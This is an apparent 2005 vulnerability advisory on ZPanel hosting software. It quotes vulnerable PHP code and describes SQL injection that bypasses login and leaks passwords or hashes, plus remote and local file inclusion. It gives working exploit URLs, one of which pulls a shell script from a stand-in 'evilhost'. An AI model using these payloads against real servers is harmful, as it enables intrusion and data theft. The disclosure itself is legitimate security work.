Few remote bugs in zPanel
Hello,
Few bugs have been discovered (accidently) in zPanel.
Developers were notified on 07.March but I have not received any
response.
Best regards, Mikhail.
-------------------------------------------------------------
[Product Description]
"ZPanel is a hosting control interface developed for both Windows and
Linux hosts.
We will soon be developing two different distributions to fit the needs of
both
platforms."
Tested:
ZPanel has been tested on the following server operating systems:
Windows Linux
2000 Advanced Server Fedora 2
2000 Server FreeBSD 4.9, 5.2.1
2003 Enterprise Server Mandrake 9.1, 9.2
XP RedHat 7.3, 9
Versions:
Stable - ZPanel v2.0
Latest Beta - ZPanel v2.5b10
[Summary]
Successful exploitation of an input validation vulnerability in ZPanel
scripts
allows attackers to execute SQL commands, include remote and local files,
get sensetive information.
[Details]
[1] SQL injection #1
Vulnarable script: index.php
Vulnerable code:
--[code]--
if (isset($_POST['uname'])) {
mysql_select_db($database_Customer_Database, $Customer_Database);
$query_TempUser = sprintf("SELECT * FROM custumerbase WHERE
servicename = '".$_POST['uname']."'");
--[/code]--
Not sanitizing userinput variable outbounds directly into SQL query.
It is possible to inject arbitrary SQL statements through 'uname' variable
and bypass the authentification.
In case of invalid user name or password user can see which parameter is
wrong.
As result:
SQL onechar bruteforce technique allows to get sensitive information
(such as nonencrypted passwords in ZPanel v.2, and md5 hashes in ZPanel
v.<=2.5 beta 10).
[2] SQL injection #2 and file inclusion
Vulnerable script: zpanel.php
Vulnerable code:
--[code v.2.5 beta]--
if (isset($_GET['page']) && $_GET['page'] != 'main') {
$query_Modules = sprintf("SELECT * FROM modules WHERE name =
'".$_GET['page']."'");
$Modules = mysql_query($query_Modules, $Customer_Database) or
die(mysql_error());
$row_Modules = mysql_fetch_assoc($Modules);
[...]
if ($row_Modules['active'] == '1') {
$body = "modules/" . $_GET['page'] .
"/index.php";
--[/code]--
or
--[code v.2.0]--
if (!isset($_GET['page'])){
$body = "main.php";
}else{
$body = $_GET['page'] . ".php";
}
--[/code]--
It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.
[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script
[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
Path disclosing avaliable in case of unsuccessfull exploitation of this
bug.
[3] Installation
By default, installation scripts are not taken away after installation.
http://localhost/ZPanel/admin/install.php
[4] Old scripts
ZPanel uses old buggy scripts. For example
phpBB Forums 2.0.8a.
[DISCLOSURE TIMELINE]
10-03-2005 Initial vendor notification.
[CREDITS & GREETS]
Goes to GHC & specially to Foster